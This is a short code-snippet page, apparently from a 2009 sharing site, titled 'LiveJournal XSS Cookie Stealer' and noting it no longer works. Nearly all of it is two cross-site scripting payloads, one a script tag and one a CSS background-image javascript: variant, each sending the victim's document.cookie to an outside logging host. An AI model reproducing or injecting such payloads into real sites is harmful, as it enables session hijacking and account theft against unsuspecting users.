Posted By

abwaters on 07/18/09


Tagged

cookie xss


Versions (?)

LiveJournal XSS Cookie Stealer


 / Published in: JavaScript
 

URL: http://jehiah.cz/archive/xss-stealing-cookies-101

Note that this no longer works

  1. <script>
  2. new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);
  3. </script>
  4.  
  5. <!-- or -->
  6.  
  7. <style>
  8. .getcookies{background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);');}
  9. </style>
  10. <p class="getcookies"></p>

Report this snippet  

You need to login to post a comment.